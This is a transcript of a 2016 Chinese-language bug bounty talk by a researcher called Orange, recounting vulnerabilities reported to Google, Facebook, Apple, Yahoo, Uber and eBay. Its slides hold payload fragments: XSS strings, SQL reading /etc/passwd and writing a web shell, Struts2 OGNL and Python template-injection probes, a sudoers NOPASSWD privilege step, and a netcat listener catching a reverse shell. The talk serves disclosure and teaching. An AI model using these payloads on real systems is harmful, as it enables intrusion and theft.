Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞

Orange
July 22, 2016

Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞

分享當個獎金獵人在參加各大廠商 Bug Bounty 計畫與尋找漏洞上的心得談, 以及那些回報中那些成功或被拒絕的案例與漏洞細節!

廠商包括 Google, Facebook, Apple, Yahoo, Uber 及 eBay,弱點則從 Remote Code Execution, SQL Injection, Logical Flaws 到特殊姿勢的 XSS 不等。

一起來看看大公司會有什麼樣的漏洞吧!

Orange

July 22, 2016
Tweet

More Decks by Orange

Other Decks in Research

Transcript

  1. Bug Bounty 成效 $6 Million • 750+ bugs in 2015

    • 300+ hackers in 2015 $4.2 Million • 526 bugs in 2015 • 210 hackers in 2015 $1.6 Million • 2500+ bugs since 2013 • 1800+ hackers since 2013
  2. 常見弱點的理解 SQL Injection Cross-Site Scripting Cross-site Request Forgery XML External

    Entity Local File Inclusion CSV Macro Injection XSLT Injection SVG/XML XSS RPO Gadget (NOT ROP) Subdomain Takeover
  3. 資訊的蒐集方法 • DNS 與 網路邊界 子域名? 相鄰域名? 內部域名? Whois? R-Whois?

    併購服務 Google 的六個月規則 • Port Scanning Facebook Jenkins RCE by Dewhurst Security Pornhub Memcached Unauthenticated Access by @ZephrFish uberinternal.com ? twttr.com ? etonreve.com ?
  4. 有做功課的 Bonus Facebook Onavo Dom-Based XSS • Mar 16, 2014

    Onavo Reflected XSS by Mazin Ahmed • May 01, 2014 Facebook fixed it • One day, Facebook revised it... Buggy again! http://cf.onavo.com/iphone/mc/deactivate.html ?url=javascript:alert(document.domain) &seed=1394953248
  5. 有做功課的 Bonus Facebook Onavo Dom-Based XSS function mc() { if

    ((UACheck == "0") || (navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPad/i)) || (navigator.userAgent.match(/iPod/i))) { document.location.href = MC; setTimeout(postmc, 3000); } else { alert('Not an iPhone/iPad...'); ... var seed = getQueryVariable("seed"); var url = getQueryVariable("url"); var UACheck = getQueryVariable("uacheck"); var MC = getQueryVariable("mc");
  6. 有做功課的 Bonus eBay SQL Injection • 列舉 eBay.com 時某台主機反查到 eBayc3.com

    • 根據 WHOIS 確認為 eBay Inc. 所擁有無誤 • 列舉 eBayc3.com images.ebayc3.com
  7. 有做功課的 Bonus eBay SQL Injection • 連貓都會的 SQL Injection 嘗試是否可以

    RCE? • 嘗試讀檔? CREATE TABLE test (src TEXT); LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE `test`;
  8. 有做功課的 Bonus eBay SQL Injection • 連貓都會的 SQL Injection 嘗試是否可以

    RCE? • 嘗試讀檔? CREATE TABLE test (src TEXT); LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE `test`;
  9. 天下武功唯快不破 • 指紋辨識, 收集整理 Web Application? Framework? • 平時做好筆記 1-Day

    出來搶首殺 WordPress CVE-2016-4567 flashmediaelement.swf XSS ImageTragick Remote Code Execution
  10. iOS Developer - "We'll be back soon" Apple confirms its

    developer website was hacked 2013 07/18 2013 07/22 天下武功唯快不破 developer.apple.com 被駭案例
  11. iOS Developer - "We'll be back soon" Apple confirms its

    developer website was hacked Ibrahim Balic: I hacked Apple's developer website and have over 100K developers' user details 2013 07/18 2013 07/22 2013 07/22 天下武功唯快不破 developer.apple.com 被駭案例
  12. iOS Developer - "We'll be back soon" Apple confirms its

    developer website was hacked Ibrahim Balic: I hacked Apple's developer website and have over 100K developers' user details Apple Hall of Fame - "We would like to acknowledge 7dscan.com, and SCANV of knownsec.com for reporting this issue" 2013 07/18 2013 07/22 2013 07/22 2013 07/?? 天下武功唯快不破 developer.apple.com 被駭案例
  13. • 被 Yahoo Bug Bounty 事件燒到, 感覺很好玩 • 依然是 Google

    hacking site:yahoo.com ext:action b.login.yahoo.com 看起來 s2-016 work 但看起來有 WAF 三個月的空窗期 ! 第一次 OGNL 就上手 ! 天下武功唯快不破 Yahoo Login Site RCE
  14. • 繞過 WAF 如何判斷關鍵字? redirect:${12*21} # /login/252 redirect:${#c=1} # /login/

    redirect:${#c=1,1} # /login/1 redirect:${#c=1,#d=new chra[10]} # /login/ redirect:${#c=1,#d=new chra[10],1} # /login/ 天下武功唯快不破 Yahoo Login Site RCE
  15. orange@z:~$ nc –vvl 12345 Connection from 209.73.163.226 port 12345 [tcp/italk]

    accepted Linux ac4-laptui-006.adx.ac4.yahoo.com 2.6.18-308.8.2.el5.YAHOO.20120614 #1 SMP Thu Jun 14 13:27:27 PDT 2012 x86_64 x86_64 x86_64 GNU/Linux orange@z:~$ 天下武功唯快不破 Yahoo Login Site RCE
  16. 天下武功唯快不破 Yahoo Login Site RCE orange@z:~$ nc –vvl 12345 Connection

    from 209.73.163.226 port 12345 [tcp/italk] accepted Linux ac4-laptui-006.adx.ac4.yahoo.com 2.6.18-308.8.2.el5.YAHOO.20120614 #1 SMP Thu Jun 14 13:27:27 PDT 2012 x86_64 x86_64 x86_64 GNU/Linux orange@z:~$
  17. • 用 Google Hacking 黑 Google site:www.google.com -adwords -finance... www.google.com/trends/correlate/js/correlate.js

    goog$exportSymbol("showEdit", function(src_url) { ... var html = (new goog$html$SafeHtml). initSecurityPrivateDoNotAccessOrElse_(' <iframe width=400 height=420 marginheight=0 marginwidth=0 frameborder=0 src="' + src_url + '">Loading...</iframe>'); ... } 認命做苦工活QQ www.google.com XSS
  18. • 如何控制? id:PaHT-seSlg9 200 OK id:not_exists 500 Error id:PaHT-seSlg9:foobar 200

    OK www.google.com/trends/correlate/search ?e=id:PaHT-seSlg9 &t=weekly <a href="#" onclick=" showEdit('/trends/correlate/edit ?e=id:PaHTseSlg9&t=weekly');"> 認命做苦工活QQ www.google.com XSS
  19. • 看起來有過濾? 但別忘了它在 JavaScript 內 HTML Entities? 16 進位? 8

    進位? www.google.com/trends/correlate/search ?e=id:PaHT-seSlg9:'">< &t=weekly <a href="#" onclick=" showEdit('/trends/correlate/edit ?e=id:PaHTseSlg9:&#39;&quot;&gt;&lt;&t=weekly');"> 認命做苦工活QQ www.google.com XSS
  20. • 看起來是個 Dom-Based 的 SELF-XSS 需要使用者互動 ? 收的機率一半一半, 需要找到更合理的情境說服 Google

    • 繼續往下挖掘! 跟 Click Jacking 的組合技? 將要點擊的地方製成 IFRMAE 放在滑鼠下隨著滑鼠移動 認命做苦工活QQ www.google.com XSS
  21. 認命做苦工活QQ Facebook Remote Code Execution • 反向 facebook.com 的 Whois

    結果 thefacebook.com tfbnw.net fb.com • 列舉 vpn.tfbnw.net 網段 vpn.tfbnw.net files.fb.com www.facebooksuppliers.com
  22. • 拿 Shell OR 1=1 LIMIT 1 INTO OUTFILE '...'

    LINES TERMINTATED by 0x3c3f... # • 拿 Root 有新功能要上怎麼辦? 給用戶一個更新按鈕 不想重造輪子有什麼現有的更新方案? Yum install Yum install 權限不夠怎麼辦? 加 Sudoers 網頁執行要輸入密碼怎麼辦? 加 NOPASSWD 認命做苦工活QQ Facebook Remote Code Execution
  23. • lookup-api.apple.com/wikipedia.org # ok • lookup-api.apple.com/orange.tw # failed • lookup-api.apple.com/en.wikipedia.org

    # ok • lookup-api.apple.com/ja.Wikipedia.org # ok 平行權限與邏輯問題 Apple XSS
  24. • Struts2 漏洞在 2012 年根本沒啥人知道 • Google Trend of Struts2

    ? ? Apple RCE 少見姿勢與神思路 Apple RCE, 第一次進入 Apple 內網
  25. • 掃 OO 廠商範圍時發現一個 IP 怎麼判斷 IP 是不是屬於 OO 廠商?

    看憑證 • 進去發現是某國外大廠寫的 OO 系統 Struts2 撰寫 Full Updated No more s2-0xx 少見姿勢與神思路 某大廠商 XSS 0-Day 發現經過
  26. • 思路: Struts2 撰寫 action 都需繼承 ActionSupport 因此要判斷一個網站是不是 Struts2 所撰寫只要在尾巴加

    個 ?actionErrors=1 即可 /whatever.action?actionErrors=<svg/onload=alert(1)> public void setActionErrors(Collection<String> errorMessages) { validationAware.setActionErrors(errorMessages); } 少見姿勢與神思路 某大廠商 XSS 0-Day 發現經過
  27. 少見姿勢與神思路 某大廠商 XSS 0-Day 發現經過 • 思路: Struts2 撰寫 action

    都需繼承 ActionSupport 因此要判斷一個網站是不是 Struts2 所撰寫只要在尾巴加 個 ?actionErrors=1 即可 /whatever.action?actionErrors=<svg/onload=alert(1)> public void setActionErrors(Collection<String> errorMessages) { validationAware.setActionErrors(errorMessages); }
  28. • Template 相關攻擊手法是近幾年比較夯的東西, 但較少人關注 Client Side Template Injection Server Side

    Template Injection • Uber 在自身技術部落格有提到產品技術細節 主要是 NodeJS 與 Flask 少了做指紋辨識的時間 少見姿勢與神思路 Uber SSTI RCE
  29. • Python Sandbox Bypass {{ [].__class__.__base__.__subclasses__() }} Hi, [<type 'type'>,

    <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, ..., <class 'upi.sqlalchemy.UberAPIModel'>, ... ..., <class 'celery.worker.job.Request'>, ... ] • Asynchronous Task Template( "Hi, %s ..." % get_name_from_db() ) 少見姿勢與神思路 Uber SSTI RCE
  30. 少見姿勢與神思路 Uber SSTI RCE • Python Sandbox Bypass {{ [].__class__.__base__.__subclasses__()

    }} Hi, [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, ..., <class 'upi.sqlalchemy.UberAPIModel'>, ... ..., <class 'celery.worker.job.Request'>, ... ] • Asynchronous Task Template( "Hi, %s ..." % get_name_from_db() )
  31. 閱讀資源 Google Bughunter University Bugcrowd List Of Bug Bounty Programs

    Hackerone Hacktivity Xsses.com Facebook Bug Bounties by @phwd Wooyun.org